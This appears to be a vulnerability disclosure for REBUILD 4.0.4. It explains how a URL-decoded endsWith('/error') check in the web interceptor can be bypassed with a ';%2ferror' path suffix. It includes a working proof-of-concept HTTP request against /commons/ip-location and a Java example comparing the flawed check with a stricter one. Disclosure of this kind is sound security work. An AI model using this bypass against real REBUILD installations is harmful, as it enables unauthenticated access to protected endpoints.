4.0.4

The affected source code class is com.rebuild.web.RebuildWebInterceptor, and the affected function is preHandle. In this code, CodecUtils.urlDecode(request.getRequestURI()) is used to obtain the URL-decoded request path, and the code then checks whether the path ends with /error (endsWith). If it does, preHandle executes return true and the rest of this interceptor is skipped. Otherwise, the request is redirected to the /user/login API.



CodecUtils.urlDecode(request.getRequestURI()) returns the URL-decoded request path. The path obtained this way is not parsed for special symbols; it is passed on directly. There is a check for .., but ; can be used to bypass it, e.g. ;%2ferror. Taking one of the backend interfaces, /commons/ip-location, as an example: requesting /commons/ip-location;%2ferror satisfies requestUri.endsWith("/error") and, at the same time, still reaches the ip-location interface, which achieves a login bypass.


POC:
GET /commons/ip-location;%2ferror?ip=https://www.baidu.com/ HTTP/1.1
Host: 127.0.0.1:18080
User-Agent: Apifox/1.0.0 (https://apifox.com)
Accept: */*
Connection: keep-alive
Cookie: RBSESSION=BD2D43DAEC4D8FDDE94D9573C26EF2C7
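
The suffix check described above, next to a stricter exemption, as an added example that is not REBUILD's own code or its official fix. java.net.URLDecoder stands in for CodecUtils.urlDecode, and the class name, method names and the contextPath parameter are assumptions made for illustration.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;

// Added example, not REBUILD code. URLDecoder is an assumed stand-in for
// CodecUtils.urlDecode; all names in this class are hypothetical.
public class ErrorPathCheckDemo {

    // The check as the advisory describes it: decode the raw request URI,
    // then exempt anything whose decoded form ends with "/error".
    static boolean skipsInterceptorAsDescribed(String rawRequestUri) {
        String requestUri = URLDecoder.decode(rawRequestUri, StandardCharsets.UTF_8);
        return requestUri.endsWith("/error");
    }

    // Stricter exemption (assumed policy): only the literal error path under
    // the context path is exempt. A raw URI carrying a path parameter (';')
    // or any percent-escape is never exempt and goes through the normal
    // login check instead.
    static boolean skipsInterceptorHardened(String rawRequestUri, String contextPath) {
        if (rawRequestUri.indexOf(';') >= 0 || rawRequestUri.indexOf('%') >= 0) {
            return false;
        }
        return rawRequestUri.equals(contextPath + "/error");
    }

    public static void main(String[] args) {
        // Constructed inputs: two ordinary paths plus the path from the PoC above.
        String[] samples = {
            "/error",
            "/commons/ip-location",
            "/commons/ip-location;%2ferror"
        };
        for (String uri : samples) {
            System.out.printf("%-32s asDescribed=%-5b hardened=%b%n",
                    uri,
                    skipsInterceptorAsDescribed(uri),
                    skipsInterceptorHardened(uri, ""));
        }
    }
}
```

For the PoC path the described check returns true and the stricter one returns false; both return true for /error and false for /commons/ip-location.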